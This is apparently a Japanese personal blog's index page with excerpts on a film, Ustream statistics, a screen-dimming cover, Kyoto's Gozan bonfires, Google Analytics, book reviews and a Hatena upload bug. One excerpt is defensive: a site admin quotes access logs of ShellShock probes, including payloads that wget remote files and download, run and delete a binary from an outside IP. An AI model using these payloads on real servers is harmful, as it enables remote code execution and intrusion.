インターステラーが見せた、未来の宇宙探査と世界予想図

(この記事はネタバレを含んでいます、小説を読まず映画だけ観て書いています)

先日、クリストファー・ノーランの「インターステラー」、二度目をIMAX劇場で観てきた。
僕の住んでいる京都府内にはIMAXはなく、大阪の109シネマズ箕面まで(片道1時間半程)。
休日であり最も混む夕方とあってか、席は8割方埋まっていた。
久々に痺れるハードSFだった。

インターステラーのタイムライン解説グラフィック (deviantart)

現在、過去、未来を激しく行き来するインターステラーの時間軸が分かりやすく図式で解説されている。


Interstellar Movie Timeline.
by sivadigitalart

2014年のUstreamを年間でまとめてみました。

日本のUstreamのデータを蓄積しているUstweetのデータを使って、2014年の一年間を通しての、日本のUstreamのランキングを取ってみました。

週間ランキングでお馴染みの、チャンネル毎のツイート数・ツイートユーザー数に加え、 視聴数の伸びも加えました。公開はしていないのですが、Ustweetでは2014年より視聴数の記録も一応しています。

既に企業と有名人と極小のコアユーザーしか使わなくなっているような Ustream ですが、一体どこまで続けられるものでしょうかね。

続きは (http://ustweet.net/matome/2014/index) で。

明るすぎるスマホ画面を暗くするカバーを自作する

お布団のそば、枕もとまでスマートフォンを持っていって寝る前にポチポチ。
横になってからも中々眠れず、またポチポチ。
そんなことをやっている依存症な人は割りと多いんじゃないかと思います。

枕元でスマホを触っていると、
いくら輝度(明るさ)を最低まで落としていても明るすぎて
全然眠くならない、困った、という人へ。

寝るときだけ簡単に装着できる、画面を暗くするカバーをオススメします。
売っていないので自作ですが、実際に使っているものを紹介します。

bash 脆弱性「ShellShock」の試行を示すHTTPアクセスログ

httpdのアクセスログを対象に以下のコマンドを実行してみると、結構ボロボロ出てきて怖い。
管理するサイトに来ている bash の脆弱性「ShellShock」にあたる攻撃の跡です。

ひとまず yum update bash で対処。mod_security も入れるべきかな。

grep '()' /var/log/httpd/access_log /var/log/httpd/ssl_access_log

ログの一部。
※外部URLを指定されているログは、リンクを防ぐために「http」を抜いています。

209.126.230.72 - - [25/Sep/2014:12:49:42 +0900] "GET / HTTP/1.0" 200 78 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)”
89.207.135.125 - - [25/Sep/2014:18:49:42 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "-" "() { :;}; /bin/ping -c 1 198.101.206.138”
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a"
24.251.197.244 - - [25/Sep/2014:20:17:42 +0900] "GET / HTTP/1.1" 200 17487 "-" "() { :; }; echo -e \"Content-Type: text/plain\\n\"; echo qQQQQQq"
166.78.61.142 - - [26/Sep/2014:00:54:52 +0900] "GET / HTTP/1.1" 200 17467 "-" "() { :;}; echo shellshock-scan > /dev/udp/pwn.nixon-security.se/4444”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
93.103.21.231 - - [26/Sep/2014:08:40:00 +0900] "GET / HTTP/1.1" 200 17306 "-" "() { :;}; wget 'taxiairportpop.com/s.php?s=example.com/'"
62.210.75.170 - - [29/Sep/2014:18:23:46 +0900] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.1" 404 224 "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null" "() { :; }; wget creditstat.ru/ZmJzZWFyY2gubmV0U2hlbGxTaG9ja1NhbHQ= >> /dev/null”
94.102.60.177 - - [26/Sep/2014:22:59:10 +0900] "GET /cgi-bin/test.cgi HTTP/1.1" 404 214 "-" "() { x;};echo;echo 123456ololo | md5sum"
83.166.234.133 - - [27/Sep/2014:11:21:09 +0900] "GET / HTTP/1.0" 200 17553 "-" "() { :;}; /bin/bash -c \"wget -q -O /dev/null ad.dipad.biz/test/example.com/\”"
70.42.149.72 - - [27/Sep/2014:11:58:11 +0900] "GET / HTTP/1.0" 200 78 "-" "() { :;}; /bin/bash -c \"wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z*\”"
54.251.83.67 - - [28/Sep/2014:01:57:22 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a”
82.221.105.197 - - [29/Sep/2014:06:18:49 +0900] "GET / HTTP/1.1" 200 78 "-" "() { :;}; /bin/bash -c \"wget 82.221.105.197/bash-count.txt\""
8.37.217.197 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"
8.37.217.199 - - [29/Sep/2014:18:42:37 +0900] "GET /search HTTP/1.1" 404 - "-" "() { :;};echo content-type:text/plain;echo;echo QwaAqdKyMkdAiaZBos;echo;exit"

 
 
 
この辺りを参考にして対処。

bashの脆弱性(CVE-2014-6271) #ShellShock の関連リンクをまとめてみた

五山の送り火

毎年、この時期(お盆)になると、京都では五山の送り火がある。

五山の送り火とは、京都の山で行われる、以下の漢字または絵を象った篝火(かがりび)のことだ。

  • 「大文字」の「
  • 「松ヶ崎妙法」の「」「
  • 「舟形万灯籠」の舟の絵
  • 「左大文字」の「
  • 「鳥居形松明」の鳥居の絵

盆に家に帰ってきた先祖の霊を、また黄泉の国へ送り届けるとされる。

Google Analyticsでユーザの操作を詳しく追跡する、一歩進んだアクセス解析

ユーザーがクリックした外部リンクの URL や回数ボタンをクリックした回数ポップアップの仮想ウィンドウが表示された回数や参照元などを知りたいときがあると思います。

こういうユーザの操作は、JavaScript などでトラッキングして自身のデータベースサーバなどに記録すればと思いがちですが、Google Analytics のイベント トラッキングを使えば、これらを簡単に記録して管理できます。

Google Analytics を使うメリット

  • データ管理の仕組みを自前で用意する必要がない
  • ページを構成する要素内からなら、どこからでも使える(主にJavaScriptやFlash)
  • Google Analytics が使え、JavaScript も使える環境なら、大体使える
  • 結果は Analytics の管理画面でそのまま見れる(当然リアルタイムでも見れる)
  • 集計したデータを何らかの用途に利用したいときには、Google Analytics API が使える

【書評】リリエンタールの末裔(上田早夕里)

 
「リリエンタールの末裔」「マグネフィオ」「ナイト・ブルーの記録」「幻のクロノメーター」
以上の、上田早夕里さんの4つの作品集。

作品ごとに共通点はなく独立していて、総評を書くことは難しい。一つ一つがしっかりした世界観のもとに描かれているので、一編よみ終えるたび深く入り込んだ意識を現実に引き戻し、自分の中で咀嚼した上で、次の世界の扉を開くのには時間がかかった。

外部API利用の個人Webサービス・アプリの立ち上げと継続

いとも簡単に外部のビッグデータにアクセスできる API なんて珍しくもなくなりましたが、慣れた人には朝飯前のように作れる外部 API 利用のサービスで、できるだけ長く継続していくためにはどのようなことが必要か、考えてみました。

そういう記事は数年前に流行った気がしますが、私的なまとめとして改めて。

【書評】となり町戦争(三崎亜記)

 
三崎亜記さんの、第17回小説すばる新人賞受賞作。
何はともかく、となり町との戦争、である。レクリエーションでもオリエンテーションでもなく、人が死ぬ本物の戦争だ。

「となり町」という単語から連想されるイメージは、とても呑気で退屈、日々の生活の延長であり、そこには殺伐としたものは一切ない。表紙絵の、突き抜けるようにのどかな空を見ていたから、虚をつかれた。

はてなフォトライフで「000000000000000」というファイルが出来てしまう

はてなブログに写真を載せるために、はてなフォトライフでアップロードしていると、「000000000000000」と表示され失敗してしまう現象に遭った。

とりあえず、はてなのサポートにメールを送っておいたのだが、ちょっと検索して調べてみたところ、どうやらこの現象は Exif に関係するものではないかということらしい。

フォトライフの設定で「画像の表示順」が「撮影順」(デフォルト)になっていると、Exifに同じ年月日時分秒を撮影日時に持つ画像はフォトライフ上に複数存在できない。同じ撮影日時のファイルがアップロードされた場合、先に存在したファイルは確認すること無く上書きされる。
 
何でこんなことになっているかというと、アップロードされた画像のファイル名を撮影日時で作っているからだと思われる
 
引用元: はてなフォトライフの困った仕様

follow us in feedly feed

PAGE TOP